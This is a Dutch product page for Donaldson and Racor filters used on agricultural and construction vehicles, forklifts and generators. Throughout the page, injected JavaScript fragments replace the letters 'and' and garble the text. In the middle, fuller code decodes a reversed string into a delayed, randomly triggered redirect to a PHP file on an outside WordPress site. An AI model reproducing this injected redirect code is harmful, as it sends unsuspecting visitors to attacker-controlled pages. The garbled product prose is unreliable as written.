Bouw-, industrie-, groeves- of landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andbouwvoertuigen, heftrucks, generatoren, kleine motoren,…

Landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andbouwvoertuigen

In de landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andbouw moet de machine steeds klaarstaan wanneer het weer onverwacht de oogst in de war stuurt. Kiezen voor Donaldsonfilters op uw voertuigen is DE garantie voor steeds perfect werkende machines. Welke landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andbouwer wil immers het risico op een mislukte oogst lopen door een onbetrouwbare filter! Donaldson rust de volgende merken origineel uit:

Heftrucks

Lucht- en hydraulische filters krijgen het hard te verduren op heftrucks. De motoren van deze kleine machines moeten hard en zwaar werk leveren. Daarom is een correct en regelmatig onderhoud onontbeerlijk om hun levensduur te verlengen. Donaldson rust de volgende merken origineel uit:

Stroomgeneratoren en compressoren

Stroomgeneratoren en compressoren worden vaak voor onbepaalde tijd op een werf geplaatst. Kiezen voor een kwaliteitsfilter is het risico verlagen dat een monteur voortdurend op en af moet rijden voor het onderhoud van de generator. Daarenboven vergroot het risico op vervuiling wanneer brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstof moet worden toegevoegd midden een werf! De doeltreffendheid van Donaldson brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstoffilters is de garantie dat geen enkel vuildeeltje uw motor bereikt! Donaldson rust de volgende merken origineel uit:

Kleine motoren en groene ruimtes

De kleinere machines en het materiaal dat wordt gebruikt bij het onderhoud van groene ruimtes bevatten evenveel filters als er motoren zijn. Daarom kiezen de gebruikers dikwijls voor origine voor het gemak, maar deze zijn vaak een stuk duurder. Daarom heeft AIS besloten om zijn gamma uit te breiden met HIFI FILTERS om dit soort filters te kunnen aanbieden aan onklopbare prijs/kwaliteit voorwaarden, en dit meestal uit voorraad leverbaar. Een probleem bij de omzetting van een referentie? Stuur of bel ze ons door en wij maken u onmiddellijk een offerte!
 

Waar ze ook wordt gebruikt verzekert de Donaldson technologie voor luchtfiltratie de bescherming van uw motor en verhoogt de levensduur van uw filter, garanties die enkel een absolute leider kan bieden. Sinds 1915 ligt Donaldson aan de bron van grote vooruitgang en vernieuwing voor de filtratie voor hoog-rendementsmotoren. Wij zijn er trots op te mogen bijdragen aan het bepalen van de prestatienormen voor filtratie en veel machinebouwers kunnen dit bevestigen.

 

PowerCore technologie

Donaldson was de eerste in 1999 om luchtfilters te ontwerpen gebaseerd op de PowerCore technologie. Sindsdien opteren heelwat machinebouwers voor deze technologie en dit om de volgende redenen:
  • Klein en met een flexibel design
  • Lichter, zonder metaal
  • 3 x meer doeltreffend dan een conventionele filter
De PowerCore, PSD filters bieden een verbeterde filtratie met een kleinere vormgeving!

Volledige luchtfilters

Donaldson biedt een volledig gamma complete filters aan voor diverse applicaties. Hierbij 4 stappen die u zullen helpen uit te maken welke complete luchtfilter het beste past voor uw applicatie:
  • Bepaal of u in “light”-, “medium”- of “heavy” omstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andigheden werkt
  • Bepaal het nodige luchtdebiet
  • Ga na over hoeveel plaats u beschikt om de filter te plaatsen
  • Ontdek het model die het beste antwoord aan uw behoefte op de volgende link

Donaldson vervangingselementen

De meeste zware voertuigen zijn reeds origineel uitgerust met Donaldson luchtfilters. Deze filters dragen aanzienlijk bij tot de verlenging van de levensduur en de betrouwbaarheid van de motoren. Vind uw filter via deze  link.

Voorfilters

Voorfilters verlengen de levensduur van uw luchtfilter. De nieuwe voorfilter TopSpin verwijdert de deeltjes voor ze in de luchtfilter terecht komen wat de levensduur verlengt en de restrictie vermindert. Deze filter vereist geen enkel onderhoud en is bijzonder gemakkelijk te plaatsen !

Cabinefilters

Donaldson cabinefilters worden vaak origineel gemonteerd omwille van de duurzaamheid. Ze verbeteren de kwaliteit van de lucht door de allergenen en de vervuilende moleculen uit te schakelen alvorens ze in de stuurhut van uw voertuig terecht komen. De gezondheid van uw personeel is u dierbaar, daarom doen wij alles om deze te behouden!
) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstoffilters”]

Moderne motoren worden gebouwd volgens strengere voorschriften en meer striktere specificaties.

De circuits, de pompen en de injectoren vereisen dus een properder brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstof voor een optimale verbrandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anding en een minimum uitstoot. Daarom kunnen de recente ontwikkelingen verwezenlijkt op het vlak van filtermedia het verschil maken tussen kracht van de motor en probleem van de motor.

Brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstofvoorfilters

Dankzij de  goedkope brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstofvoorfilter wordt reeds een groot deel onzuiverheden verwijderd voor ze in de primaire en secondaire filter tercht komen. Ze verzekeren een langere levensduur aan de filterelementen gemonteerd op hetzelfde circuit.

Spin-On en vervangingspatronen

Het gamma Donaldson brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstofilters werd de laatste jaren sterk uitgebreid. Door hun prestaties, het merk waardig, een grote flexibiliteit en lage prijzen, zijn deze produkten onomzeilbaar geworden op de markt. Deze filters dragen aanzienlijk bij tot de verlenging van de levensduur en de betrouwbaarheid van de motoren. Zoek uw vervangingspatroon via deze  link.

Brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstof-water afscheiders

Onze waterafscheiders met brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstofilter “long life” vangen vuil en onzuiverheden in de brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstof aanwezig en verwijderen het water dat uw motor zou kunnen beschadigen. De afvoerventielen Twist&Drain maken het vuile en complexe werk van het aftappen van het water in de brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstoffilter een stuk gemakkelijker.

Volledige primaire en secondaire brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstoffilters

De primaire filter is een filter met een groot vermogen die aan de aanzuigkant van de pomp wordt gemonteerd . Hij moet het water uit het circuit verwijderen voor dit in de pomp terecht komt. De secondaire filter is gemaakt om weerstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and te bieden aan een hogere druk dan deze waaraan de primaire filter is blootgesteld, en wordt aan de drukkant van de pomp gemonteerd. Hij verzekert een optimale filtratie van de onzuiverheden en is onontbeerlijk om de wateremulsies die in sommige circuits voorkomen, te verwijderen .

Racor brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstoffilters

Om ons gamma brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstoffilters te vervolledigen, bieden wij sinds enkele jaren ook Racor complete filters en vervangingselementen aan. Racor is door de jaren heen een specialist in brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstoffilters geworden en zodoende kunnen wij u, samen met Donaldson, een compleet gamma van eerste kwaliteit aanbieden!

Olie is essentieel voor de mobiele delen van uw motor. Olie smeert namelijk deze delen, maakt dat de motor niet overhit raakt en verwijdert de deeltjes die vastlopen (een blokkering)  kunnen veroorzaken. Donaldson oliefilters houden uw motorolie zuiver door alle onzuiverheden die uw motor kunnen beschadigen, op te vangen. De vormgeving van de nieuwste motoren vereist daarenboven een fijnere filtratie dan vroeger. En niet te vergeten, de moderne technieken op uitstootkontrole en de striktere tolerantie van de onderdelen vereisen meer doeltreffende filters.

Zoekt u aan Full-flow of Bypass-filter ?

Full-flow oliefilters zijn ontworpen om uw olie zuiver te houden door alle onzuiverheden op te vangen. De FullFlow filter is op het meerendeel van de motoren DE oplossing voor alles wat u nodig heeft voor het smeren van uw motoronderdelen. Het gebruik van een Bypass-filter garandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeert een continu circulatie van ongeveer 10% van de olie aanwezig in het smeercircuit. Dit soort filtratie is een perfecte aanvulling van de FullFlow filter omdat hij ook de fijnere deeltjes onschadelijk maakt. Kortom, wat u ook zoekt voor uw oliefiltratie, wij vinden de passende oplossing!

Opdraaibare oliefilters

De “long life” oliefilters ontwikkeld door Donaldson, beschermen het prestatievermogen van uw machines zodat u zich kan focussen op wat echt belangrijk is: uw werk doen! . Deze filters dragen aanzienlijk bij tot de verlenging van de levensduur en de betrouwbaarheid van de motoren. Vind uw filter via deze link.
 

Filterpatronen

Donaldson omvat een volledig gamma oliefilterpatronen voor alle merken. .Deze filters dragen aanzienlijk bij tot de verlenging van de levensduur en de betrouwbaarheid van de motoren. Vind uw filter via deze link.
 

Complete Lage/Midden/Hoge druk filters

Wij bedelen een gamma complete hydraulische Donaldson filters (lage-, midden en hogo-druk) die u kan ontdekken op de volgende link.

Vervangingselementen

Wij bieden u een ongeëvenaard gamma vervangingselementen en opdraaifilters voor hydraulische toepassingen. Donaldson heeft daarenboven een grote waaier aan filtermedia die u toelaten om de filter te kiezen die het best beantwoordt aan de zuiveringseisen van uw hydraulisch systeem. Deze filters verlengen aanzienlijk de levensduur en de betrouwbaarheid van uw motoren. Zoekt naar uw vervangingsfilter via de volgende link.

Ontluchters

Beschikbaar in een breed gamma modellen, materialen en afmetingen. De ontluchters zorgen voor een aanvoer van propere lucht in uw reservoirs en andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere opslagapparatuur waar luchtcirculatie voorkomt naargelang het niveau van de vloeistoffen varieert.

Retourfilters binnen in uw hydraulische tank

Alvorens de olie, aan het einde van haar hydraulische cyclus, terugvloeit in de tank, is het fundamenteel dat deze eerst gefilterd wordt. Wanneer olie door een hydraulisch circuit stroomt stuit het op vuil. Filtreren op het einde van het parcours voorkomt dat de volledige tank wordt vervuild.

Roest, kalkaanslag, vuil…zijn enkele van de vele onzuiverheden waar een motor mee wordt geconfronteerd. Onvoldoende bescherming kan leiden tot motorpech of erger. Het koelcircuit moet de temperatuur van de motor op het juiste niveau houden en zodoende een minimum aan brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstof  verbruiken. Donaldson koelvloeistoffilters verwijderen de onzuiverheden, vermijden een filterverstopping en dragen bij tot de goede werking van de motor. Filtratie van koelvloeistof is een kwestie van evenwicht. Deze filters verlengen aanzienlijk de levensduur en de betrouwbaarheid van uw motoren.

 

Koelvloeistoffilters en vervangingspatronen

Koelvloeistoffilters zijn ontworpen om het vereiste chemisch evenwicht in standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and te houden en de aanwezigheid van vervuilende deeltjes binnen het koelcircuit van de motor te verminderen. Deze filters verlengen aanzienlijk de levensduur en de betrouwbaarheid van uw motoren. Zoek uw vervangingspatroon via deze link.

Testset voor koelvloeistof (chemisch evenwicht)

Wij bieden u een snelwerkende testset aan om het chemisch evenwicht van de vloeistof binnen uw koelcircuit te behouden. Deze kits zijn zeer practisch om het vereiste evenwicht te controleren.

Wabco luchtdrogers